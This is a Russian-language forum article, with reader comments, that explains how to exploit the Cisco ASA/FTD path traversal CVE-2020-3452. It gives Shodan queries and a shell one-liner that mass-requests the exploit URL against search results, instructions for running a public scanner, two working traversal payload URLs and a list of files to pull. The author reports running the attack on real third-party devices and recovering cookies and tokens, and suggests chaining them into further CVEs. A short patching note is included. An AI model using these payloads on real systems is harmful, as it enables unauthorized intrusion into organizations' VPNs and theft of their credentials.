Статья Уязвимость CVE-2020-3452

3452v0.PNG


Приветствую Друзей,Уважаемых Форумчан и Читателей Форума.
Сегодня поговорим немного о нашумевшей уязвимости в Cisco
Оперативно искать решение проблемы IT-компании заставил Михаил Ключников.
Эксперт из Positive Technologies не впервые находит опасные уязвимости.

Данная уязвимость касается межсетевого экрана Cisco ASA.
И получив идентификатор CVE-2020-3452,она имеет высокий уровень опасности.
Если на устройстве проигнорирована проверка вводных данных,
то атакующий получает доступ к файловой системе и может читать файлы конфигурации WebVPN.

Компания Cisco срочно выпустила патч,но как всегда не все читают новости.
И по-традиции покажу как эксплуатируется такая уязвимость на реальном примере.

Администрация Форума и автор обзора напоминают о соблюдении законодательства.
Запрещено применение рассматриваемых методик атак в незаконных целях.
Информация предоставлена исключительно в рамках ознакомления и изучения проблем безопасности.


Для нахождения уязвимых целей воспользуемся поисковиком shodan.
Интерес представляют следующие версии:
Cisco ASA:9.7 ;9.8 ;9.9 ;9.10 ;9.12 ;9.13 ;9.14
Cisco FTD:6.2.2; 6.2.3 ;6.3.0 ;6.4.0 ;6.5.0 ;6.6.0

Запросы для поисковика:
+CSCOT+ ;+CSCOCA+ ;+CSCOL+ ;+CSCOU+ и +CSCOE+
Если имеется готовый api-key для shodan,то можно его вставить в этот скрипт.
И выполнить поиск из терминала:
Код:
# shodan search Cisco ASA --fields ip_str --separator " " | awk '{print $1}' | while read host do ; do curl -s -k  "https://$host/+CSCOT+/translation-tab..." ; done

Проверка на уязвимость CVE-2020-3452
Очень удобным оказался для этого сканер от PR3R00T из Англии.
Прилагается файл urls.txt ,который чистим и заполняем списком своих целей
Формат заполнения: https://IP-цели,либо https:// сайт и домен
Кто админит Cisco, могут также воспользоваться для проверки своих веб-интерфейсов сканером:
Код:
# git clone https://github.com/PR3R00T/CVE-2020-3452-Cisco-Scanner.git
# cd CVE-2020-3452-Cisco-Scanner
# chmod +x scanner.py
# python3 scanner.py urls.txt
Вот нам сканер указывает на непропатченные машины.

3452v.png


Эксплуатация

Работать будем с Burpsuite,но может кому пригодиться и exploit
Вокальные данные у него неплохие,но рассчитан он на совместную работу в терминале с Nmap.
Впрочем,аналогично может обработать целый список хостов.

3452v1.png


В Burpsuite используются в основном 2 вида POC для атаки Path Traversal :
Код:
https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
https://<domain>/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
Запрос при атаке в дальнейшем меняется и вместо portal_inc.lua подставляется:
logo.gif
http_auth.html
user_dialog.html
localization_inc.lua
portal_inc.lua
include
nostcaccess.html
ask.html
no_svc.html
svc.html
session.js
useralert.html
ping.html
help
app_index.html
tlbr
portal_forms.js
logon_forms.js
win.js
portal.css
portal.js
sess_update.html
blank.html
noportal.html
portal_ce.html
portal.html
home
logon_custom.css
portal_custom.css
preview.html
session_expired
custom
portal_elements.html
commonspawn.js
common.js
appstart.js
appstatus
relaymonjar.html
relaymonocx.html
relayjar.html
relayocx.html
portal_img
color_picker.js
color_picker.html
cedhelp.html
cedmain.html
cedlogon.html
cedportal.html
cedsave.html
cedf.html
ced.html
lced.html
files
pluginlib.js
shshim
do_url
clear_cache
connection_failed_form
apcf
ucte_forbidden_data
ucte_forbidden_url
cookie
session_password.html
tunnel_linux.jnlp
tunnel_mac.jnlp
sdesktop
gp-gip.html
auth.html
wrong_url.html
logon_redirect.html
logout.html
logon.html
test_chargen
Таким образом,прочитываем файлы,в которых можно найти конфиденциальную информацию.

3452v2.png


Здесь,к примеру,найдены cookie ,token и прочее:

3452v3.png


Token можно сразу же применить для раскрутки другой опасной уязвимости CVE-2020-3259
Она позволяет ввалиться во внутреннюю сеть атакуемой организации.
А если цель подвержена ещё и CVE-2020-3187,то можно отключить VPN.
Далеко так заходить конечно не станем.

У другой цели была обнаружена вот такая страница авторизации.

3452v4.png


И результат атаки:

3452v5.png


Здесь без комментариев:

3452v6.png


Просматриваем useralert:

3452v7.png


Объёмный файл,в котором конфигурация,описание авторизации и местонахождения файлов с паролями:

3452v8.png


Защита

Защитное программное обеспечение от данной уязвимости с описанием
Кроме этого,необходимо проверить конфигурацию с проверкой вводных данных.
Без кропотливой настройки веб-интерфейс может быть по-прежнему уязвим.

Тестируемые ресурсы живы и невридимы,им не причинено ущерба.
Благодарю всех за внимание и до новых встреч.
 

ROP

Red Team
27.08.2019
327
664
BIT
163
Спасибо вам за статью!
Очень интересно почитать про новые уязвимости. Особенно, если они про Cisco :)
 
  • Нравится
Реакции: Vertigo

tanazy

One Level
24.08.2019
4
1
BIT
92
Спасибо, очень актуально, только закончил обновление FMC и FTD на 6.6.0.1
 
  • Нравится
Реакции: Vertigo

Vo1t

New member
28.09.2020
1
0
BIT
0
Похоже это наиболее полезная статья по данной уязвимости в интернете )
Кто-нибудь разобрался, как это использовать?
Ну можно читать файлы, и что дальше?
Перспективно выглядит вот этот кусок кода

Код:
function SetSessionData(index,name,value)

   local f1
   f1=io.open("/sessions/"..index.."/session_data","w")

Но что за индекс - непонятно
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!